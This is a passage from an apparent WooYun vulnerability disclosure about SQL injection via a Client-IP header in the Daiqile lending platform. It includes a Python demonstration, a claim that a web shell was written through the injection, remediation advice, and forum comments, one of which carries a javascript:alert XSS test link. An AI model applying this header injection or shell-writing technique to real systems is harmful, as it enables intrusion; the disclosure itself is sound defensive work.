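    print("xff  ->", addip_fragment(via_xff))       # payload before the comma is dropped
    print("cip  ->", addip_fragment(via_cip))       # payload reaches the SQL intact
    print("safe ->", ip_address_hardened(via_cip))  # falls back to the peer address
```

Even with the hardened helper the value should still be bound as a query parameter; input validation narrows the attack surface, parameterisation closes it.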

Proof of vulnerability:

[Screenshot: 1 (4).jpg]


The shell written through the injection, just uploaded.

Fix:

Escape everything that still needs escaping (and do not decode input after the filter has run).
Validate that inputs are legal.

Copyright notice: please credit ′雨。@乌云 (WooYun) when reposting.


Vulnerability response

Vendor response:

Severity: High

Rank: 18

Confirmed: 2015-08-24 14:36

Vendor reply:

Thanks

Latest status:

None


Comments

  1. 2015-08-24 10:08 | DloveJ ( Regular white hat | Rank:1159 Vulns:208 | <a href=javascrip:alert('xss')>s</a> ...)

    Damn, front row!!!

  2. 2015-08-24 10:08 | 玉林嘎 ( Regular white hat | Rank:798 Vulns:99 )

    Bowing down

  3. 2015-08-24 10:11 | xy0er ( Intern white hat | Rank:42 Vulns:8 | x)

    Badass.

  4. 2015-08-24 10:12 | qhwlpg ( Regular white hat | Rank:245 Vulns:63 | Focused on code audit.)

    On my knees

  5. 2015-08-24 10:15 | DNS ( Regular white hat | Rank:455 Vulns:53 | Guess who I am?)

    Face-slapped again; I did say it was a fat target

  6. 2015-08-24 10:22 | missy ( Regular white hat | Rank:719 Vulns:201 | .....-3-3-3-3-3-3-3-3-3-3-3-3-3)

    Happy slapping.

  7. 2015-08-24 10:23 | 继续沉默 ( Intern white hat | Rank:62 Vulns:9 | Study hard, improve every day)

    Face-slapped again; this vendor is really asking for it

  8. 2015-08-24 10:31 | 大师兄 ( Passer-by | Rank:14 Vulns:6 | Checks WooYun every day)

    Rain god is on a roll again

  9. 2015-08-24 11:14 | M4sk ( Regular white hat | Rank:1213 Vulns:321 | Information security in China has a long way to go and needs both vendors and white hats...)

    Rain god is on a roll again

  10. 2015-08-24 11:44 | scanf ( Core white hat | Rank:1317 Vulns:191 | 。)

    RMB again

  11. 2015-08-24 13:37 | Tr0jan ( Passer-by | Rank:7 Vulns:3 | Follows network security)

    V2015.8.10: we invited well-known domestic white-hat teams for high-pressure testing; after long trials it remained unscathed, and the white-hat teams kept giving it the thumbs up! On the strength of our own capability we have earned wide customer acclaim; among our customers there are dozens with transaction volumes over 100 million yuan, which is the best proof. We hope customers using the genuine Daiqile system will continue to support us as always, and we also hope customers using pirated Daiqile will stay away from piracy and switch to the genuine Daiqile system as soon as possible; otherwise you will be harassed by hackers, and by the time you call on us it will be too late; the loss will not be merely the price of a system, but the trust of your customers. At the same time, we reserve the right to sue customers using pirated Daiqile systems. Daiqile V2015.8.10 remains high-performance and high-resilience with an experience beyond expectations, all-round security defence with no blind spots, blocking the usual SQL injection, upload, cross-site and weak-password attacks, together with a scheduled patrol detection system against trojans and hackers. As the "leader" of the online-lending system industry, Daiqile people are willing to do the unglamorous work for our customers. Finally, when choosing a system, customers must keep their eyes open, not be deceived by pirated copies, and choose the genuine system! Customers using pirated systems will ultimately reap what they sow; in the end they only hurt themselves. We also warn competitors represented by a certain "Meng" who maliciously use hacker attacks on pirated Daiqile systems to slander the genuine customers of the industry leader Daiqile, who ride on Daiqile's reputation for self-promotion, and who engage in irregular marketing and defamation: we have arranged for a legal team to pursue prosecution against them.

  12. 2015-08-24 13:50 | tzwx ( Passer-by | Rank:2 Vulns:1 | Wu Xie is still here, but Tianzhen is gone)

    Just here for the show

  13. 2015-08-24 14:50 | 爱神 ( Passer-by | Rank:4 Vulns:1 | Qq190290957)

    @Tr0jan face-slapped.

  14. 2015-08-24 15:23 | 牛肉包子 ( Regular white hat | Rank:254 Vulns:64 )

    @疯狗 bro, please review http://www.wooyun.org/bugs/wooyun-2015-0135577/trace/ff0fc16d321e35452b8216ff77bd0acc

  15. 2015-11-17 16:35 | _Thorns ( Regular white hat | Rank:1056 Vulns:184 | WooYun is the Bigest gay place :))

    Learned a lot from reading this. OP 666